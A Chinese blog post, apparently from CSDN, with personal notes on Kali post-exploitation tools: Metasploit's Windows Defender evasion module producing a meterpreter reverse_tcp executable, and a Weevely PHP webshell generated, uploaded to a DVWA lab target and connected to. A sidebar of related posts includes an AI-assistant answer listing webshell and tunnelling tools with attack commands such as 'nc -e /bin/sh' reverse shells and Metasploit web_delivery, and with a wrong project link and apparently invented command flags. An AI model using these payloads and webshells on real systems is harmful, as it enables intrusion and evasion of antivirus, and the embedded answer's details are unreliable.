kali里的powersploit、evasion、weevely等工具的杂项记录

已于 2022-07-28 17:56:36 修改
阅读量416 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: kali powersploit evasion weevely
于 2022-07-28 16:34:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/angleoldhen/article/details/126036335
这篇博客介绍了如何在Kali Linux中使用PostExploitation工具,特别是OSBackdoors,启动Python Web服务器,并在Windows测试机上利用Powershell进行免杀攻击。通过Metasploit框架展示如何选择免杀模块,设置参数并执行payload。此外,还讲解了如何创建并使用PHP网页木马Weevely,以及如何在靶机上上传和激活。博客还提到了文件隐藏和远程操作命令的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具

点击后其实是进入一个目录

 然后利用python启动一个WEB服务器

在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000

msf框架里的evasion

  • msfconsole
  • show evasion   // 查看免杀模块

  •  use evasion/windows/windows_defender_exe
  • show options   // 查看参数

  • set filename test.exe   //自己定义一个文件名,不然是随机起名 
  • set payload windows/meterpreter/reverse_tcp
  • run

 这是一个隐藏目录

可以使用命令  

将文件移动到可视位置 

学习时可以扔到https://www.virscan.org等平台检测一下

weevely只能生成PHP的网页木马 在kali里执行

weevely generate 123456 /home/kali/test.php

其中123456是密码 

到靶机dvwa上传

上传成功后,根据页面提示的路径访问一下木马网页

 回到kali,执行 

  • weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
  • 密码要放在最后,且须与前面设置的一致

输入  help 查看可用的远程操作的命令

 

 

 

 

 

 

Kali渗透测试:Metasploit 6.0 中的Evasion模块
Liu_Bruce的博客
05-11 893
Kali渗透测试:Metasploit 6.0 中的Evasion模块 Metasploit 开发团队一直致力于免杀技术的研究,并且将一些研究成果应用在了这款产品中。其中Evasion模块可以生成免杀的远程控制被控端。在启动Metasploit时,可以看到Evasion模块,启动命令如下: ┌──(root💀kali)-[~] └─# msfconsole 8个evasion模块,如下图所示: 使用show evasion命令可以列出Metasploit 6.0中的所有Evasion模块 msf6 &g
kali下的webshell工具--weevely
老夏家的云
03-12 2537
Weevely -------------------------------------- 主要特点: 隐蔽的类终端的PHP webshell 30多个管理模块 执行系统命令、浏览文件系统 检查目标服务器的常见配置错误 基于现有连接,创建正向、反向的TCP shell连接 通过目标机器代理HTTP流量 从目标计算机运行端口扫描,渗透内网 支持连接密码 ...
kali之veil-evasion免杀安装找不到wine32包-亲测解决方案
跃祥博客
12-27 3088
该软件需要wine32包,一般在64位kali是只有wine64包 所以需要更新架构 dpkg --add-architecture i386 apt-get update 之后就可以安装veil时就可以安装wine32了。 安装veil-evasion: apt-get install veil-evasion ...
Powersploit的安装及脚本攻击实战
weixin_42478365的博客
03-10 335
https://www.cnblogs.com/zhengna/p/12186118.html
Kali linux 学习笔记(八十二)免杀——veil-evasion 2020.4.20
闵行小鱼塘
04-20 1257
简单了解下veil-evasion
OSCP Learning Notes - Post Exploitation(4)
weixin_30609331的博客
07-31 142
Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali Linux, IE8-Win7 and Kioptrix Level 1 as showed in the following screenshoots. The Kali L...
kali自带的webshell工具weevely教程--并没有成功的教程
MOLLMY的专栏
08-08 4453
文章目录写在前面官方教程翻译xctf web 10 webshell最终还是用菜刀解决 写在前面 最近在做xctf的新手入门题,个人偏好web和reverse,crypto碰都不想碰。。 做到web 题第10题的时候遇到一个特别烦的问题,我自己主机上装菜刀等web shell不是下载时就被chrome删掉就是解压时被系统防火墙删掉,不敢把防护全关了,只能在虚拟机再装个windows。 然而装起来...
利用Kali Linux与Weevely渗透测试DVWA靶机(low安全等级)文件上传漏洞
Liu_Bruce的博客
12-13 1984
Weevely是一款轻量级PHP木马生成器和控制框架,允许用户创建一个后门程序并通过Web shell与其交互。它支持多种功能如执行命令、下载/上传文件等,非常适合用于渗透测试场景下的远程管理任务。
kalilinux全工具中文帮助文档
02-13
kalilinux全工具中文帮助文档包括各种工具的中文帮助
Kali下高效免杀工具Veil-Evasion的使用分享
免杀工具作为攻击者广泛使用的工具之一,具有能够逃避安全软件检测的特点,而“veil-evasion”就是这类工具中的一款代表。 ### Veil-Evasion介绍 Veil-Evasion是一款专门为渗透测试人员设计的工具,用于生成反病毒...
NTFS数据流扫描工具
12-21
ntfs有一种文件,称为流文件。在普通模式下观察不到,杀软查不到,但确实存在这个文件。很多病毒利用NTFS文件系统这一特殊属性,隐藏病毒。此工具可以检查出各种流文件。
kali-漏洞利用】(3.4)免杀Payload 生成工具(下):Veil后门使用、监听失败原因
08-06 1819
kali-漏洞利用】Veil后门使用、监听失败原因
Evasion 使用及实际免杀测试
时乙的博客
10-06 932
kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成的木马的实际免杀效果。 360版本:13.0.0.2002 备用木马库:2021-10-05 360杀毒:5.0.0.8140 火绒版本:5.0.63.2 病毒库:2021-09-29 Evasion使用 msfconsole进入msf show evasion 查看Evasion所提供的模块 一、evasion/windows/windows_defender_exe...
只用evasion模块本身生成病毒
2301_80419020的博客
01-03 323
【代码】只用evasion模块本身生成病毒。
渗透测试之Metasploit,零基础入门到精通,收藏这一篇就够了
leah126的博客
12-21 1625
msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。msfvenom所有参数。
MSF使用教程
热门推荐
huangyongkang666的博客
03-26 1万+
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
Windows和Linux系统查看端口和文件占用
最新发布
A1_3_9_7的博客
03-21 849
在Windows环境中要知道当前端口被哪个进程所占用,或者是查看当前系统网络的会话连接,操作如下:(1)、查看端口被那个进程ID(PID)所占用查看指定端口,使用命令:netstat -ano | findstr “445”上边这个445端口当前正在监听0.0.0.0地址,可以看到占用进程PID为4findstr更多用法可以通过findstr /?查看(2)、通过PID查看进程上边已知进程PID为4,使用命令:tasklist | findstr "4"查找进程。
Metasploit6.0系列教程 -- MSF控制台命令
Web安全工具库
10-09 1505
一、启动命令 msfconsole 二、显示命令:show 1、showevasion 查看evasion模块包含的内容 2、showoptions use,选择某模块,然后查看需要设置的参数 3、show按两次键盘上的Tab键,显示show可用参数 三、设置命令:set set srvport 8888 四、可直接执行OS命令 五、连接数据库 1、初始化 msfdbinit 2、启动MSF查看数据库状态 db_status 六、查看...
Meterpreter Post-Exploitation分析
爱测未来团队博客
08-09 2383
Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。
有哪些在kali可以平替weevely3的工具
03-02
<think>嗯,用户之前问过关于Weevely3的错误问题,现在他们想知道Kali Linux中有哪些工具可以替代Weevely3。我需要先回顾一下之前的对话,确保这次回答连贯。用户可能在进行渗透测试,尤其是Web后门方面的工作,所以他们需要一个可靠的工具替代品。 首先,我应该考虑Weevely3的主要功能。Weevely3主要用于生成和管理PHP后门,提供文件管理、Shell访问、提权等功能。用户遇到的错误提示可能让他们觉得Weevely3已经过时或者有兼容性问题,所以需要替代工具。 接下来,我需要列出Kali Linux中常见的后门管理工具。常见的可能有PhpSploit、Pwncat、Cobalt Strike、Metasploit的模块、WebShells等。每个工具的特点需要简要说明,比如是否支持Python3、功能范围、使用难度等。 还要注意用户可能的需求,比如是否需要开源免费、是否需要图形界面、是否适合特定场景(比如内网渗透)。例如,Cobalt Strike功能强大但商业付费,而Metasploit的Web Delivery模块可能更适用于某些情况。 此外,用户可能对工具的维护状态和社区支持感兴趣。比如,PhpSploit是活跃的开源项目,而Weevely3已经停止更新,这点需要强调。同时,像Pwncat这样的工具虽然功能强大,但可能需要Python环境,用户可能需要安装依赖。 还要考虑用户的技术水平,是否需要简单易用的工具,或者是否需要高级功能。比如,冰蝎和哥斯拉适合WebShell管理,但可能需要配置。而Netcat和Socat更基础,适合简单反向Shell。 最后,应该提供选择建议,帮助用户根据具体需求挑选合适的工具。比如,如果用户需要主动维护的PHP后门工具,推荐PhpSploit;如果需要多功能后渗透,推荐Pwncat或Metasploit。 需要确保信息准确,每个工具的特点和示例命令正确无误。同时,提醒用户注意法律和授权问题,确保渗透测试在合法范围内进行。</think>以下是针对**Kali Linux**环境下可替代Weevely3的工具推荐,根据使用场景分类整理: --- ### 一、PHP WebShell管理工具(直接替代) | 工具名称 | 特点 | 项目地址 | |---------------|----------------------------------------------------------------------|---------------------------------------------| | **PhpSploit** | - 完全兼容Python3<br>- 加密通信 + 绕过WAF<br>- 支持文件/数据库/提权操作 | [GitHub](https://github.com/nil0x42/phpsploit) | | **AntSword** | - 图形化WebShell管理工具<br>- 插件扩展丰富<br>- 支持多语言后门 | [官网](https://ant.design/) | | **C99** | - 经典PHP WebShell<br>- 基础文件管理功能 | (需自行搜索资源) | **示例(PhpSploit)**: ```bash # 生成PHP后门 phpsploit -generate -payload php -password admin -output shell.php # 连接目标 phpsploit -target http://victim.com/shell.php -password admin ``` --- ### 二、多功能后渗透框架(高级替代) | 工具名称 | 优势 | 适用场景 | |-----------------|----------------------------------------------------------------------|-----------------------------| | **Pwncat** | - 基于Python3<br>- 支持多平台反弹Shell持久化<br>- 自动提权模块 | Linux/Windows内网渗透 | | **Cobalt Strike** | - 可视化协同作战<br>- 强大的横向移动能力<br>- 商业级漏洞利用 | 红队行动/APT模拟 | | **Metasploit** | - `web_delivery`模块生成Payload<br>- 集成漏洞利用链 | 快速部署反向Shell | **Metasploit示例**: ```bash use exploit/multi/script/web_delivery set target PHP set payload php/meterpreter/reverse_tcp set LHOST 192.168.1.100 exploit # 生成PHP代码在目标执行即可获得Meterpreter会话 ``` --- ### 三、轻量级替代方案 | 工具类型 | 工具示例 | 典型用法 | |---------------|-------------------------|-------------------------------------| | **反向Shell** | Netcat / Socat / Ncat | `nc -e /bin/sh 192.168.1.100 4444` | | **加密隧道** | Chisel / Stowaway | 穿透防火墙进行内网漫游 | | **Web代理** | TinyShell / reGeorg | 通过HTTP协议建立Socks代理 | **reGeorg使用流程**: 1. 上传`tunnel.php`到Web服务器 2. 本地执行: ```bash python reGeorgSocksProxy.py -p 8080 -u http://victim.com/tunnel.php ``` 3. 使用Proxychains全局代理流量 --- ### 四、国产工具推荐 | 工具名称 | 特色功能 | |------------|--------------------------------------------------------------------------| | **冰蝎** | - 动态密钥加密通信<br>- 支持文件管理和命令执行 | | **哥斯拉** | - 多类型Payload支持<br>- 流量混淆绕过IDS | | **GodPot** | - 集成WebShell管理+漏洞扫描<br>- 自动化后渗透工作流 | --- ### 五、选择建议 | 需求场景 | 推荐工具 | |--------------------------|----------------------------------| | 快速部署PHP后门 | PhpSploit / AntSword | | 长期控制+横向移动 | Cobalt Strike / Pwncat | | 简单反向Shell | Metasploit `web_delivery`模块 | | 内网穿透+代理 | Chisel + reGeorg组合使用 | --- ### 附:工具对比矩阵 | 特性 | Weevely3 | PhpSploit | Pwncat | Metasploit | |---------------------|----------|-----------|--------|------------| | 维护状态 | ✖ 停止 | ✔ 活跃 | ✔ 活跃 | ✔ 活跃 | | Python3兼容 | ✖ | ✔ | ✔ | ✔ | | 加密通信 | 基础AES | 动态密钥 | TLS | 可配置 | | 自动提权 | ✔ | ✔ | ✔ | ✔ | | 图形界面 | ✖ | ✖ | ✖ | ✔(Armitage)| --- **注意事项**: 1. 所有操作需在**合法授权**范围内进行 2. 建议在隔离环境测试工具(如使用Kali官方VM镜像) 3. 复杂场景推荐组合使用工具,例如: - 用`web_delivery`部署初始访问 - 通过`Chisel`建立隧道 - 使用`Pwncat`进行权限维持 如需具体工具的详细使用教程,可告知您的重点需求方向。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值